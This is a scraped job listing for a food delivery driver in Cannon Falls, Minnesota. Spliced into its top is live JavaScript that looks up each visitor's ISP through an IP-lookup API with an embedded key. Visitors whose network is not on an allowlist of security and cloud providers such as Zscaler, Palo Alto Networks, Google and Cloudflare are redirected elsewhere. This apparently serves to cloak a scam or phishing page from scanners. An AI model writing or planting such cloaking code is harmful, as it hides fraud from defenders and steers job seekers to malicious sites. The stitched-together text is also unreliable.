Food Delivery Driver
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
We are seeking a reliable Food Delivery Driver to join our team in Cannon Falls, Minnesota. As a Delivery Driver, you will be responsible for delivering orders promptly and safely to customers, ensuring a positive experience.
Key Responsibilities:
- Deliver food orders to customers accurately and efficiently.
- Follow delivery routes and time schedules.
- Provide excellent customer service and address any inquiries or concerns.
- Ensure food safety and quality during transit.
- Maintain vehicle cleanliness and report any maintenance issues.
Skills & Qualifications:
- Valid driver’s license and a clean driving record.
- Strong navigation skills and familiarity with the local area.
- Good communication and customer service skills.
- Ability to work independently and manage time effectively.
- Must be reliable, responsible, and punctual.
Benefits:
- Flexible scheduling options.
- Competitive pay with potential tips.
- Opportunity to work in a dynamic, fast-paced environment.
- Employee discounts and appreciation programs.